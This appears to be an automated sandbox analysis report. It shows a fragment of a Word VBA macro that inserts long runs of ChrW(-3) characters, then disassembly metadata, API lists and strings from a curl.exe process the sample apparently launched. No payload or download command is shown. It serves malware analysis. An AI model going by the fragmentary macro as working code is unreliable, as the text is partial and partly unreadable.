78	. InsertAfter Text := ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3)	ChrW
82	. InsertParagraphAfter
84	. InsertAfter Text := ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3)	ChrW
91	. InsertParagraphAfter
93	. InsertAfter Text := ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3)	ChrW
101	. InsertAfter Text := ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3)	ChrW
113	. InsertParagraphAfter
114	End With
115	End Sub

Reset < >

Analysis Process: curl.exePID: 3136, Parent PID: 300COMMON

Non-executed Functions

Function 000000013F48A9B4 Relevance: 74.0, APIs: 29, Strings: 13, Instructions: 530filetimeCOMMON

Download Yara Rule

APIs

_close.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,000000013F48F5B7,?,00000001,?,00000000), ref: 000000013F48AA14
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,000000013F48F5B7,?,00000001,?,00000000), ref: 000000013F48AA72
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,000000013F48F5B7,?,00000001,?,00000000), ref: 000000013F48AA8D
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,000000013F48F5B7,?,00000001,?,00000000), ref: 000000013F48ABAA
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,000000013F48F5B7,?,00000001,?,00000000), ref: 000000013F48AE1C
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,000000013F48F5B7,?,00000001,?,00000000), ref: 000000013F48AE32
_unlink.API-MS-WIN-CRT-FILESYSTEM-L1-1-0 ref: 000000013F48AE7C
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?), ref: 000000013F48AED0
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?), ref: 000000013F48AF09
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F48AFB1
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F48AFBF
_get_osfhandle.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F48AFC8
_lseeki64.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F48AFD9
SetEndOfFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 000000013F48AFE9
fseek.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F48AFFD
CreateFileA.API-MS-WIN-CORE-FILE-L1-1-0 ref: 000000013F48B06E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F48B080
SetFileTime.API-MS-WIN-CORE-FILE-L1-1-0 ref: 000000013F48B0BB
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F48B0C5
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 000000013F48B0E4
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F48B0EC
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,000000013F48F5B7,?,00000001,?,00000000), ref: 000000013F48B133
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,000000013F48F5B7,?,00000001,?,00000000), ref: 000000013F48B149
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,000000013F48F5B7,?,00000001,?,00000000), ref: 000000013F48B16C
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000000013F48B182
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000000013F48B1B0
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000000013F48B1BA
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000000013F48B1C4
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000000013F48B1D1

Strings

The Retry-After: time would make this command line exceed the maximum allowed time for retries., xrefs: 000000013F48ADF5
curl: (23) Failed seeking to end of file, xrefs: 000000013F48B00C
Throwing away %I64d bytes, xrefs: 000000013F48AFA1
Problem %s. Will retry in %ld seconds. %ld retries left., xrefs: 000000013F48AF47
curl: (23) Failed to truncate file, xrefs: 000000013F48B032
Removing output file: %s, xrefs: 000000013F48AE6A
More details here: https://curl.se/docs/sslcerts.htmlcurl failed to verify the legitimacy of the server and therefore could notestablish a secure connection to it. To learn more about this situation andhow to fix it, please visit the web page mentioned abo, xrefs: 000000013F48AA6B
Failed to set filetime %I64d on outfile: SetFileTime failed: GetLastError %u, xrefs: 000000013F48B0CE
curl: (%d) %s, xrefs: 000000013F48AA50
curl: (%d) The requested URL returned error: %ld, xrefs: 000000013F48AB6C
Failed to set filetime %I64d on outfile: overflow, xrefs: 000000013F48AEEE
curl: (%d) Failed writing body, xrefs: 000000013F48AAA7, 000000013F48AE51
Failed to set filetime %I64d on outfile: CreateFile failed: GetLastError %u, xrefs: 000000013F48B0F5

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: free$Filefclose$ErrorLast_filenofflushfputs$CloseCreateHandleTime_close_get_osfhandle_lseeki64_strdup_unlinkfseek
String ID: Failed to set filetime %I64d on outfile: CreateFile failed: GetLastError %u$Failed to set filetime %I64d on outfile: SetFileTime failed: GetLastError %u$Failed to set filetime %I64d on outfile: overflow$More details here: https://curl.se/docs/sslcerts.htmlcurl failed to verify the legitimacy of the server and therefore could notestablish a secure connection to it. To learn more about this situation andhow to fix it, please visit the web page mentioned abo$Problem %s. Will retry in %ld seconds. %ld retries left.$Removing output file: %s$The Retry-After: time would make this command line exceed the maximum allowed time for retries.$Throwing away %I64d bytes$curl: (%d) %s$curl: (%d) Failed writing body$curl: (%d) The requested URL returned error: %ld$curl: (23) Failed seeking to end of file$curl: (23) Failed to truncate file
API String ID: 1498925360-3108001027
Opcode ID: a73a3ba6d359a00be64fd700ec82ab30abb951a048ffa5e5e14543965c4d49d4
Instruction ID: 41a8d817345e0c1c0b97255e7d9d3d5ca0d2c7a4779eecb245b25d2fd4787773
Opcode Fuzzy Hash: a73a3ba6d359a00be64fd700ec82ab30abb951a048ffa5e5e14543965c4d49d4
Instruction Fuzzy Hash: 1D32DF72F006509AFB68DF25D8487EA2BA4F744B84F44453EDE1A4BBD5DB7ACA42C340

Function 000000013F4A49D0 Relevance: 53.5, APIs: 9, Strings: 21, Instructions: 975stringCOMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,00000000,00000001,00000001,00000000,00001388,00000000,000000013F4A590C), ref: 000000013F4A4A42
strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F4A4C16
strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F4A4C3B
strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F4A5109
strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F4A5268
strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F4A527B
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,000000013F49DE4D), ref: 000000013F4A580A
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,000000013F49DE4D), ref: 000000013F4A58A9

Strings

localhost, xrefs: 000000013F4A4D77
expires, xrefs: 000000013F4A4E9B
path, xrefs: 000000013F4A4D0D
%4095[^;=] =%4095[^;], xrefs: 000000013F4A4AE6
Added, xrefs: 000000013F4A55B9
__Secure-, xrefs: 000000013F4A4C0F, 000000013F4A51FD
%s cookie %s="%s" for domain %s, path %s, expire %I64d, xrefs: 000000013F4A55C3
WARNING: failed to open cookie file "%s", xrefs: 000000013F4A5838
httponly, xrefs: 000000013F4A4CE2
Replaced, xrefs: 000000013F4A55AD
none, xrefs: 000000013F4A57B7
domain, xrefs: 000000013F4A4D5B
skipped cookie with bad tailmatch domain: %s, xrefs: 000000013F4A4E07
version, xrefs: 000000013F4A4E4F
__Host-, xrefs: 000000013F4A4C34, 000000013F4A521F
#HttpOnly_, xrefs: 000000013F4A50FF
TRUE, xrefs: 000000013F4A5261, 000000013F4A5304, 000000013F4A5340
max-age, xrefs: 000000013F4A4E75
oversized cookie dropped, name/val %zu + %zu bytes, xrefs: 000000013F4A4F8A
secure, xrefs: 000000013F4A4CAE
FALSE, xrefs: 000000013F4A5274

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: strncmp$strcmp$__acrt_iob_func_time64fclose
String ID: #HttpOnly_$%4095[^;=] =%4095[^;]$%s cookie %s="%s" for domain %s, path %s, expire %I64d$Added$FALSE$Replaced$TRUE$WARNING: failed to open cookie file "%s"$__Host-$__Secure-$domain$expires$httponly$localhost$max-age$none$oversized cookie dropped, name/val %zu + %zu bytes$path$secure$skipped cookie with bad tailmatch domain: %s$version
API String ID: 2920273863-749307724
Opcode ID: 2a3735125d465d9038771dfe4a2ceceefc8435c8ef398494971df7135751f7b0
Instruction ID: 523b6659ea23776dd8e0699ed854301e9f8e453ca2af99e0ba0ba115a21b45c1
Opcode Fuzzy Hash: 2a3735125d465d9038771dfe4a2ceceefc8435c8ef398494971df7135751f7b0
Instruction Fuzzy Hash: 1A929A35A05B8086FF649B25E6407EF27E0F754B98F58413DDA49477E6EB38C6AB8300

Function 000000013F4A2B14 Relevance: 40.5, APIs: 14, Strings: 9, Instructions: 245networkstringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F4A2BE4
strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F4A2C1B
inet_pton.WS2_32 ref: 000000013F4A2D0C
htons.WS2_32 ref: 000000013F4A2D1F
bind.WS2_32 ref: 000000013F4A2D49
inet_pton.WS2_32 ref: 000000013F4A2D71
htons.WS2_32 ref: 000000013F4A2D84
htons.WS2_32 ref: 000000013F4A2DBF
htons.WS2_32 ref: 000000013F4A2DEF
htons.WS2_32 ref: 000000013F4A2E30
bind.WS2_32 ref: 000000013F4A2E46
getsockname.WS2_32 ref: 000000013F4A2E72
WSAGetLastError.WS2_32 ref: 000000013F4A2E7C
WSAGetLastError.WS2_32 ref: 000000013F4A2EB2

Strings

getsockname() failed with errno %d: %s, xrefs: 000000013F4A2E98
Couldn't bind to '%s', xrefs: 000000013F4A2D9C
Name '%s' family %i resolved to '%s' family %i, xrefs: 000000013F4A2CB7
